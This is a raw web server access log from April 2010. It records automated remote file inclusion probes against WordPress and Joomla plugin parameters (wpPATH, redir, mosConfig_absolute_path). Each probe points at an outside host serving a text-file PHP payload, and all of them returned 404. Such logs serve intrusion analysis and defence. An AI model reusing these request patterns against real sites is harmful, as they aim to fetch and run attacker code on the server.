78.105.175.132 - - [20/Apr/2010:09:55:39 -0500] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
78.105.175.132 - - [20/Apr/2010:09:55:39 -0500] "GET /logs/access_log.1227484800//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://kepsa.com/kpop/lat_bbs_web/id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
79.174.78.178 - - [20/Apr/2010:09:55:44 -0500] "GET /index.php?redir=http://www.fileden.com/files/2010/2/22/2770116/two.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
79.174.78.178 - - [20/Apr/2010:09:55:44 -0500] "GET /logs/access_log.1220054400%20%20/index.php?redir=http://www.fileden.com/files/2010/2/22/2770116/two.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
79.174.78.178 - - [20/Apr/2010:09:55:45 -0500] "GET /logs/index.php?redir=http://www.fileden.com/files/2010/2/22/2770116/two.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:09:57:09 -0500] "GET /logs/access_log.1238803200%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:09:57:09 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:09:57:09 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:09:58:14 -0500] "GET /logs/access_log.1262563200//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
